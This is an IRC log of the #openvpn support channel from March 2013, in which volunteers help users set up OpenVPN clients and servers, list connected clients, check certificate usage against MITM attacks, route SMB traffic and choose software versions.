19:29 < pekster> M1L0: First you want to get OpenVPN connected without errors. Check the client and server logs for any listed errors. Then you want to try a ping in both directions to check connections between the client and server. 
With no OpenVPN errors and good logs, firewalls are usually the reason for pings to get lost 19:32 -!- raidz is now known as raidz_away 19:46 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 19:57 -!- CygniX [~CygniX@unaffiliated/twois10] has quit [Quit: Konversation terminated!] 19:59 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 20:09 < M1L0> thx... i go see that now.. 20:24 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 245 seconds] 20:29 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 20:29 -!- defswork [~andy@141.0.50.105] has joined #openvpn 20:30 < hrenovo> hmm, on windows 7 just installed openvpn gui, and when I right click on the icon in the task bar, the only two options I see there is 1. Settings 2. Exit 20:30 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 20:30 < hrenovo> No Connection option ) 20:31 < M1L0> first copi files into config folder 20:32 < M1L0> cert, key, ovpn, etc 20:32 < hrenovo> ah! there is no .conf file 20:33 < M1L0> copy client conf files into c:/program files/openvpn/config 20:35 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 260 seconds] 20:36 < hrenovo> M1L0: copi-ing ) 20:37 -!- defswork [~andy@141.0.50.105] has joined #openvpn 20:40 < M1L0> cool 20:50 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 245 seconds] 20:51 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 20:51 -!- mode/#openvpn [+o krzee] by ChanServ 21:01 < pekster> hrenovo: You too should read and follow the howto guide if you are new to openvpn. It guides you through the entire setup: 21:01 < pekster> !howto 21:01 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! 
or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 21:01 < hrenovo> I think I got this figured all out 21:02 < hrenovo> its working perfectly now 21:02 < pekster> Great 21:02 < hrenovo> 4 clients connected 21:02 < hrenovo> my next thing is to figure out how to make clients pingable 21:02 < hrenovo> or even if I should make them pingable or not 21:02 <@krzee> hehe 21:02 < hrenovo> or how to see the list of connected clients 21:02 <@krzee> don't block ping in the firewall = pingable 21:03 < hrenovo> krzee: let me check 21:03 <@krzee> list of connected clients could be a status file (i think) or the management interface (my preferred way) 21:03 < pekster> On the OpenVPN server you can send it a USR2 signal and it will print a "status" output to your logfile (or stdout if you're not using a syslog or logfile) 21:03 < hrenovo> whats the management interface ? 21:03 < pekster> Yes, or the management interface or a status directive 21:03 < pekster> Lots of ways to get status :) 21:04 < pekster> !management 21:04 <@vpnHelper> "management" is (#1) see http://openvpn.net/management for doc on management interface or (#2) read http://svn.openvpn.net/projects/openvpn/obsolete/BETA21-preauto/openvpn/management/management-notes.txt if you are a programmer making a GUI that will interact with OpenVPN 21:04 < pekster> !status 21:04 < pekster> !factoids search status 21:04 <@vpnHelper> No keys matched that query. 21:04 < pekster> !factoids search --values status 21:04 <@vpnHelper> 'webgui' and 'logs' 21:05 < pekster> !learn status as You can use the --status directive to write to a status file to show the list of currently connected clients. This list can be sent to stdout (or your defined !log mechanism) with a USR2 signal as well. 21:05 <@vpnHelper> Joo got it. 21:06 < pekster> !learn status as See also !management 21:06 <@vpnHelper> Joo got it. 
21:10 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 21:14 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 256 seconds] 21:22 < RudyValencia> OK so we're generating OpenVPN certificates using OpenSSL according to http://www.macfreek.nl/memory/Create_a_OpenVPN_Certificate_Authority and we are getting the following error: 21:22 <@vpnHelper> Title: Create a OpenVPN Certificate Authority - Exterior Memory (at www.macfreek.nl) 21:22 < RudyValencia> 140282962425512:error:0E06D06C:configuration file routines:NCONF_get_string:no value:conf_lib.c:335:group=CA_default name=email_in_dn 21:22 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 21:23 < RudyValencia> The error occurs while making a client certificate. 21:37 < hrenovo> I am reading up on the management interface and I am confused ) 21:38 < hrenovo> where do I set --management ? 21:38 < hrenovo> in server.conf ? 21:41 < hrenovo> also, which management GUI is recommended currently? I see a very big list in the wiki here https://community.openvpn.net/openvpn/wiki/RelatedProjects 21:41 <@vpnHelper> Title: RelatedProjects – OpenVPN Community (at community.openvpn.net) 21:43 < pppingme> gui? its easy to setup and use if you understand the concepts involved.. 21:43 < pekster> hrenovo: We don't really recommend any GUI. OpenVPN is at its core a command line tool, and thus the best way to interact with it is at the command line 21:47 < hrenovo> pekster: understood. Any way to see currently connected clients ? 21:48 < hrenovo> pekster: using command line 21:48 < hrenovo> pekster: you mentioned management interface, but I am not sure how to enable it. where do I set --management ? in server.conf ? 
21:52 -!- Thermi_ [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Ping timeout: 240 seconds] 21:53 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 21:55 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 21:56 < pekster> hrenovo: Yes, see the manpage and look for the --management option. Or, as stated earlier: 21:56 < pekster> !status 21:56 <@vpnHelper> "status" is (#1) You can use the --status directive to write to a status file to show the list of currently connected clients. This list can be sent to stdout (or your defined !log mechanism) with a USR2 signal as well. or (#2) See also !management 21:57 < pekster> You have 3 ways to show the connected clients. Pick one. 22:00 < robert___> is there a way to tell a "server" from a "client" via the ifconfig-up script or something? 22:00 -!- robert___ is now known as robert_ 22:00 < robert_> (like, does it push certificate information into the environment when it runs the script) 22:02 < pekster> You configure a server vs client differently, thus asking to distinguish them at runtime seems a strange thing to do 22:02 < pekster> What's your usecase? 22:04 -!- hrenovo_ [~hrenovo@li469-37.members.linode.com] has joined #openvpn 22:04 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Read error: Connection reset by peer] 22:05 < hrenovo_> sorry just got disconnected for a sec 22:06 < hrenovo_> I have uncommented client-to-client but I cannot see any other nodes in network center 22:06 -!- hrenovo_ is now known as hrenovo 22:07 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 22:07 < robert_> we have two classes of endpoint that will be connecting (signed by the same CA) with separate different keyUsages; I want to tell one keyUsage from the other so I can enable client-to-client for one class, but not the other. 
22:09 < robert_> "server" roles are supposed to be unrestricted, while "client" roles are supposed to only consume the services "server" roles provide. 22:09 < rob0> client-to-client is global, is it not? 22:13 < robert_> oh wait, I may be over-thinking here. 22:13 -!- ngharo_ [~ngharo@hacked.thegov.us] has joined #openvpn 22:13 -!- master_of_master [~master_of@p4FF24861.dip.t-dialin.net] has joined #openvpn 22:13 -!- matsh_ [divine@nanogene.org] has joined #openvpn 22:13 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 240 seconds] 22:13 -!- ngharo [~ngharo@hacked.thegov.us] has quit [Ping timeout: 240 seconds] 22:13 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 240 seconds] 22:13 -!- matsh [divine@nanogene.org] has quit [Ping timeout: 240 seconds] 22:13 -!- matsh_ is now known as matsh 22:13 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 22:14 -!- defswork [~andy@141.0.50.105] has joined #openvpn 22:14 -!- master_o1_master [~master_of@p4FF24CB8.dip.t-dialin.net] has quit [Read error: Operation timed out] 22:14 -!- ngharo_ is now known as ngharo 22:18 -!- master_o1_master [~master_of@p4FF243C7.dip.t-dialin.net] has joined #openvpn 22:20 -!- master_of_master [~master_of@p4FF24861.dip.t-dialin.net] has quit [Ping timeout: 258 seconds] 22:22 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 22:24 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 22:29 < RudyValencia> OK so we are trying to set up a link between a remote OpenVPN server in Dallas and a local OpenVPN server here in Colorado. Is it possible to join two instances of OpenVPN like this to create a VPN-based intranet? 22:29 < RudyValencia> basically, can the two servers communicate with each other, and can the local server provide remote services to clients through the link? 
22:30 < pppingme> lots of variables, but what I would do is create a simple p2p link between the two sites and either static route or run a routing protocol to get routing correct between both sides 22:31 < pekster> robert_: What you really want is to firewall clients dynamically as they connect. Don't use client-to-client so that the traffic is pushed to your kernel and you can firewall the traffic in the standard way for your OS 22:31 < pekster> robert_: Use --client-connect for that, and then you can use the environmental variables to use whatever you'd like to apply firewall rules to that connection. You likely want to pair --client-disconnect with that to remove the dynamic rules when a client disconnects 22:34 < RudyValencia> The Colorado OpenVPN service is running on a TP-Link router with OpenWRT, if that introduces a bit of clarity. 22:35 < robert_> I was asking if 'nsCertType server' clients certificates could be accessed (by default) by type 'nsCertType Client' client certificates. 22:35 < robert_> client certificates* 22:36 < pekster> could be accessed by? 
22:36 < robert_> once they're on the vpn I mean 22:37 < pekster> Sure 22:38 < pekster> Certificates have nothing to do with the data flow; they're used purely as an authentication mechanism, and you can hook into it on either end to perform additional connection checks or dynamic rules based on any of the X509 fields 22:38 -!- matsh_ [divine@nanogene.org] has joined #openvpn 22:38 < pekster> Generally, you want clients to verify that they're reaching a server cert to prevent MITM attacks from other valid client certs: 22:38 < pekster> !mitm 22:38 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: remote-cert-tls server in the client config 22:39 < pekster> --remote-cert-tls is the new version of --ns-cert-type and should be used instead of the deprecated "Netscape" extensions. As cool as Netscape Navigator is... 22:39 -!- matsh [divine@nanogene.org] has quit [Ping timeout: 240 seconds] 22:39 -!- matsh_ is now known as matsh 22:39 < pekster> They both functionally do the same thing 22:42 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Read error: Operation timed out] 22:42 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 22:54 < RudyValencia> We set up extended key usage attributes 22:55 < RudyValencia> the server certs only have serverAuth and the client certs only have clientAuth 23:02 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Ping timeout: 252 seconds] 23:03 < pekster> RudyValencia: Great, then you might want to use the --remote-cert-eku option. 
Be aware that --remote-cert-tls requires an *exact* match on the ku+eku fields, so that may not be suitable 23:04 < pekster> I too prefer eku as my keying feature for server/client, and generally like to do: --remote-cert-eku "TLS Web Server Authentication" in my client config files. This prevents MITM attacks by naughty clients, and lets me use just the eku if I choose 23:04 < pekster> You may use the display name or the OID to match on ku/eku values 23:09 -!- JStoker [jstoker@claire.jcs.me.uk] has joined #openvpn 23:09 -!- JStoker [jstoker@claire.jcs.me.uk] has quit [Changing host] 23:09 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 23:09 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has quit [Remote host closed the connection] 23:09 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has joined #openvpn 23:14 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 240 seconds] 23:15 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 23:16 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 23:18 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 23:27 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Quit: I quit] 23:37 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 264 seconds] 23:40 -!- xbanux [~xbanux@triband-mum-59.182.152.25.mtnl.net.in] has joined #openvpn 23:53 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.3.8] 23:53 -!- RudyValencia [~self@unaffiliated/rudyvalencia] has quit [Read error: Connection reset by peer] 23:54 -!- Matir_ [~matir@ubuntu/member/matir] has quit [Ping timeout: 260 seconds] 23:58 -!- RudyValencia [~self@unaffiliated/rudyvalencia] has joined #openvpn --- Day changed Wed Mar 20 2013 00:07 -!- Matir [~matir@ubuntu/member/matir] has joined #openvpn 00:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 00:14 -!- mitz 
[~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 00:41 -!- M1L0 [~M1L0@200.106.37.56] has quit [Quit: Saliendo] 00:43 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.3.8] 00:47 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 00:49 -!- RudyValencia [~self@unaffiliated/rudyvalencia] has quit [Read error: Connection reset by peer] 00:53 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.3.8] 00:55 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 01:09 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 258 seconds] 01:13 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 01:16 -!- xbanux [~xbanux@triband-mum-59.182.152.25.mtnl.net.in] has quit [Ping timeout: 252 seconds] 01:22 -!- xbanux [~xbanux@triband-mum-59.182.152.25.mtnl.net.in] has joined #openvpn 01:33 -!- brute11k [~brute@89.249.231.107] has joined #openvpn 01:34 -!- master_of_master [~master_of@p4FF24B99.dip.t-dialin.net] has joined #openvpn 01:38 -!- master_o1_master [~master_of@p4FF243C7.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 01:42 -!- novaflash_away is now known as novaflash 01:50 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds] 01:56 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 01:57 -!- dazol [~dazo@2001:470:de40:1021::14] has joined #openvpn 01:57 -!- dazol is now known as dazo 01:57 -!- dazo [~dazo@2001:470:de40:1021::14] has quit [Changing host] 01:57 -!- dazo [~dazo@openvpn/community/developer/dazo] has joined #openvpn 01:57 -!- mode/#openvpn [+o dazo] by ChanServ 02:17 -!- brute11k [~brute@89.249.231.107] has quit [Quit: Leaving.] 
02:22 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 03:28 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection] 03:33 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 03:36 -!- Diffen [~diffen@80.78.212.242] has joined #openvpn 03:42 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 04:11 -!- Diffen [~diffen@80.78.212.242] has quit [Quit: Leaving] 04:18 * EugeneKay gives pekster a cookie 04:22 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 04:25 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 04:32 -!- JacquesBH [~jacques@unaffiliated/jacquesbh] has quit [Remote host closed the connection] 04:55 -!- zeroXten [~zeroXten@0x10.co.uk] has quit [Ping timeout: 245 seconds] 04:57 -!- zeroXten [~zeroXten@0x10.co.uk] has joined #openvpn 04:57 -!- zeroXten [~zeroXten@0x10.co.uk] has quit [Client Quit] 04:58 -!- zeroXten [~zeroXten@0x10.co.uk] has joined #openvpn 05:01 -!- xbanux [~xbanux@triband-mum-59.182.152.25.mtnl.net.in] has quit [Remote host closed the connection] 05:02 -!- xbanux [~xbanux@triband-mum-59.182.147.208.mtnl.net.in] has joined #openvpn 05:30 -!- xbanux [~xbanux@triband-mum-59.182.147.208.mtnl.net.in] has quit [Ping timeout: 276 seconds] 05:39 -!- xbanux [~xbanux@triband-mum-59.182.147.208.mtnl.net.in] has joined #openvpn 05:45 -!- JSharpe__ is now known as JSharpe 05:59 -!- tekzilla [~jon@24.134.142.157] has joined #openvpn 06:00 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 06:01 < tekzilla> hey, i'm trying to use 'route-nopull' followed by some 'route' statements in client-config on the server (ccd) 06:01 < tekzilla> but the server logs says the "cannot be used in this context" 06:01 < tekzilla> *they 06:02 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 06:04 <@EugeneKay> That's 
because that's a --client option 06:05 <@EugeneKay> You're probably looking for --push-reset 06:07 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection] 06:08 < tekzilla> aah ok, thanks! 06:10 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 06:10 -!- kls [~kls@198.211.125.123] has joined #openvpn 06:10 < kls> hello! 06:12 < kls> General question — is it possible for clients to access each others' SMB shares over a routed connection? 06:12 < kls> Or is it only possible over bridged ones? 06:12 < MacGyver> Let me see. 06:12 < MacGyver> !smb 06:13 < MacGyver> No factoid for that? 06:13 < MacGyver> kls: The answer is in the howto. 06:13 < MacGyver> http://openvpn.net/index.php/open-source/documentation/howto.html#samba 06:13 <@vpnHelper> Title: HOWTO (at openvpn.net) 06:13 < MacGyver> Have fun. 06:14 < MacGyver> Oh, that's not even the right link. 06:14 < MacGyver> Sec. 06:16 < MacGyver> http://openvpn.net/index.php/open-source/documentation/howto.html#config 06:16 <@vpnHelper> Title: HOWTO (at openvpn.net) 06:16 < MacGyver> (It's still the howto) 06:16 < MacGyver> You'll need to check what you need to uncomment for client-to-client traffic. 06:17 < MacGyver> It's probably "client-to-client", since openvpn has the habit of using sensible names for config directives. 06:21 < tekzilla> look at OpenVPN go! :) 06:22 <@EugeneKay> kls - yes, totally. Should work just fine over routed, with the appropriate firewall rules 06:22 <@EugeneKay> If you want name resolution you'll need DNS and/or WINS 06:22 <@EugeneKay> !wins 06:22 <@vpnHelper> "wins" is http://oreilly.com/catalog/samba/chapter/book/ch07_03.html is a good link for seeing how to run WINS on samba 06:26 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Remote host closed the connection] 06:28 < kls> EugeneKay, MacGyver, thanks! 
06:28 < kls> Hmm, let's try this 06:29 < kls> !iptables 06:29 <@vpnHelper> "iptables" is (#1) to test if iptables is your problem, disable all rules or put the defaults to accept: iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -F; iptables -Z or (#2) please see http://openvpn.net/man#lbBD for more info or (#3) you can see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for pf or iptables or (#4) These is just the 06:29 <@vpnHelper> basics to get OpenVPN working. Proper firewall design is beyond the scope of this channel. You can try #iptables 06:29 < kls> really cool. :) 06:30 < jzaw> EugeneKay, may i ask for a memory prompt re /30 and tun/tap endpoints 06:30 < kls> thanks guys 06:30 <@EugeneKay> !/30 06:30 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 06:30 <@EugeneKay> See #5 ^ 06:30 < jzaw> im about to ask my isp for either /30 if itll do or a /29 if necessary 06:31 <@EugeneKay> For what? 06:31 <@EugeneKay> Giving vpn clients publicly-routable VPN IPs? 06:31 < jzaw> already have that working 06:31 < jzaw> but my tap0 's are 10.0.0.x 06:31 < jzaw> and when i trace from the router itself ... it doesnt 06:32 < jzaw> as my server end is no nat 06:32 <@EugeneKay> !goal ? 06:32 <@EugeneKay> !goal 06:32 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 06:32 < jzaw> proper tracing and debugging ... 
if i give them proper ips i can both trace from the router and to its vpn tap 06:33 <@EugeneKay> There's nothing improper about RFC1918 space 06:33 <@EugeneKay> You just need to tell your router how to reach VPN clients..... via a route 06:34 < jzaw> thats done afaik 06:34 < jzaw> i can reach hosts behind the vpn 06:34 < jzaw> client hosts behind the vpn 06:34 < jzaw> from without 06:34 < jzaw> ie YOU can reach them 06:35 < jzaw> but theres no way for you to ping the tap0 06:35 -!- pyrobisqit [~yaaic@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 06:35 -!- pyrobisqit [~yaaic@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Quit: Main screen turn off!] 06:40 <@EugeneKay> So? Unless your vpn clients are providing a service to the outside world there isn't much reason for somebody to need to reach them from the internet at-large 06:41 <@EugeneKay> Even if they are, just do a NAT on the port you need them to be reachable on. 06:41 <@EugeneKay> No need to waste public IPv4s 06:49 < kls> Samba SUCKS so much. When will we have a new protocol replacing it? Why can't, say, AFP become the standard? 06:59 <@EugeneKay> Because AFP is even worse 07:00 < kls> Isn't there anything else? 07:00 <@EugeneKay> SMB isn't going away any time soon; it's pretty deeply entrenched in AD & family 07:01 < kls> It seems quite limited at times. And mostly because of — drumroll — windows clients not being able to comprehend e.g. proper write-only access. 07:02 < kls> Or the major suck with unicode filenames. 07:02 <@EugeneKay> FWIW, Windows is the reference implementation 07:03 < kls> Yes... And that's why I don't understand why we have to kind of force it on the rest of the world. 07:03 <@EugeneKay> Because Samba is the minority? 07:03 < kls> What is the majority then? I honestly don't know the bigger alternatives 07:03 <@EugeneKay> Windows? 07:04 < kls> Ah, OK. Yes. 07:04 < kls> Sorry. :) 07:04 < kls> Got it. 
07:04 < kls> Under "Samba" I meant "Windows file sharing protocol", whatever its proper name should be. 07:05 <@EugeneKay> Also remember that SMB covers a lot more than just file sharing - it also does printers, raw serial ports, RPCs.... 07:05 <@EugeneKay> Bits and pieces of this are done in other protocols(SFTP for example), but no one protocol does all of it 07:05 <@EugeneKay> It's really the building block for Windows Network Operating System, aka AD-DS 07:05 -!- pyrobisqit [~yaaic@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 07:05 <@EugeneKay> You can't just toss that out the window 07:06 <@EugeneKay> And despite your rantings, it really is rather performant. I regularly use it across WAN links with no issues aside from the expected amount of lag. 07:06 <@EugeneKay> With non-Windows implementations ;-) 07:06 <@EugeneKay> It comes down to configuring your servers & clients properly 07:08 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 07:08 -!- mode/#openvpn [+o plaisthos] by ChanServ 07:10 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has quit [Ping timeout: 245 seconds] 07:13 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has joined #openvpn 07:21 -!- pyrobisqit [~yaaic@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Quit: Main screen turn off!] 07:41 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 07:45 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:49 -!- brute11k [~brute@89.249.231.173] has joined #openvpn 07:50 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 07:50 -!- xbanux [~xbanux@triband-mum-59.182.147.208.mtnl.net.in] has quit [Ping timeout: 276 seconds] 07:52 -!- xbanux [~xbanux@triband-mum-59.182.147.208.mtnl.net.in] has joined #openvpn 08:00 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:00 < Valcorb> up 08:02 < kls> EugeneKay: yes, I think so. 
I just had massive problems w/ setting up a proper SMB server under OSX Mountain Lion 08:02 < kls> Partly because of Apple's wise move of writing yet another SMB implementation 08:04 < kls> Not optimal at all. 08:07 -!- tcamuso_ [tcamuso@nat/redhat/x-stzdjglvmiahqwgn] has joined #openvpn 08:08 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 08:08 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:16 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 08:16 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Remote host closed the connection] 08:18 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 08:33 -!- xbanux [~xbanux@triband-mum-59.182.147.208.mtnl.net.in] has quit [] 08:49 -!- corretico [~luis@190.211.93.38] has joined #openvpn 08:58 -!- pyrobisqit [~pyrobisqi@87.red-88-5-221.dynamicip.rima-tde.net] has joined #openvpn 08:58 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:59 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 08:59 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 09:00 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Client Quit] 09:11 -!- JesseC [~JesseCWor@wsip-98-175-20-126.br.br.cox.net] has quit [] 09:17 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 09:19 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has joined #openvpn 09:21 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 09:29 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 09:56 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 09:56 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 09:58 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 10:04 -!- erry 
[erry@freenode/staff/erry] has quit [Quit: Reconnecting] 10:04 -!- kls [~kls@198.211.125.123] has left #openvpn [] 10:04 -!- erry [erry@freenode/staff/erry] has joined #openvpn 10:16 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 10:17 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 10:19 -!- raidz_away is now known as raidz 10:24 -!- star314 [~star314@xchg.fiss-oeaw.at] has joined #openvpn 10:24 -!- star314 [~star314@xchg.fiss-oeaw.at] has quit [Max SendQ exceeded] 10:25 -!- star314 [~star314@xchg.fiss-oeaw.at] has joined #openvpn 10:25 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 10:30 < jzaw> [11:41:10] No need to waste public IPv4s 10:30 < jzaw> hehe 10:31 < jzaw> i make it my personal mission to use up the european ipv4's ... bring on ipv6 ! 10:31 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 10:38 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 10:38 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 10:38 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 10:38 -!- mode/#openvpn [+o krzee] by ChanServ 10:39 < Rienzilha> :) 10:42 <@ecrist> >:-) 10:42 < pekster> jzaw: RFC6598 allows for ISPs to use NAT. Plenty of ways to avoid IPv6 if someone needs an excuse. Until we want IPv6 enough it won't come much faster than it does today 10:44 < jzaw> aye pekster and some numpty will bring out NAT6 10:44 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 10:44 < Rienzilha> and until it's there we won't want it 10:44 < pekster> It's already here. You're not supposed to need it, but that doesn't stop poor implementation. 
Hopefully consumers can mitigate that with enough alternatives 10:45 < Rienzilha> well the technology is there, but no end user needs it 10:45 < pekster> They might if an ISP only allocates a single /64 to a home network 10:45 < Rienzilha> no company in their right mind would set up services exclusively on ipv6 10:45 < Rienzilha> pekster: that isp would go bankrupt quickly :D 10:45 < pekster> Oh, "it" being IPv6, not NAT6 10:45 < Rienzilha> yeah ipv6 10:45 < jzaw> we don't need a spare hole in the head but someone invented trepanning 10:46 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 10:46 -!- dlucio [~dieu@CPEbcc8100f9978-CMbcc8100f9975.cpe.net.cable.rogers.com] has joined #openvpn 10:46 <@ecrist> I doubt anyone is going to do NAT6 at the ISP level 10:46 < dlucio> hello people 10:46 < dlucio> little question 10:47 < dlucio> does windows8 have problems with openvpn 2.2.2? 10:48 <@ecrist> yes 10:48 <@ecrist> why would you run 2.2.2? 2.3.0 is what you should run 10:49 < jzaw> hehe tell that to debian wheezy ecrist 10:49 <@krzee> !repo 10:49 <@vpnHelper> "repo" is openvpn runs some software repositories for your installing pleasure, http://community.openvpn.net/openvpn/wiki/OpenvpnSoftwareRepos 10:49 <@krzee> you tell it to your distro 10:49 <@krzee> heh 10:51 <@EugeneKay> One of these days I'll relearn to package RPMs 10:51 < dlucio> ecrist, i know it is for a distro packaging, mageia is frozen now, and i can only push 2.3 if there is a good reason 10:51 < dlucio> such as windows8 incompatibility for example 10:52 < dlucio> i need to know if there is a good reason to push 2.3 , not only to be on the fancy edge of releases 10:52 <@ecrist> jzaw: his question was about windows 8, not debian 10:52 <@ecrist> dlucio: you can use 2.3.0 as a client for a 2.2.2 server 10:53 <@ecrist> but not the other way around as reliably 10:53 -!- star314 [~star314@xchg.fiss-oeaw.at] has quit 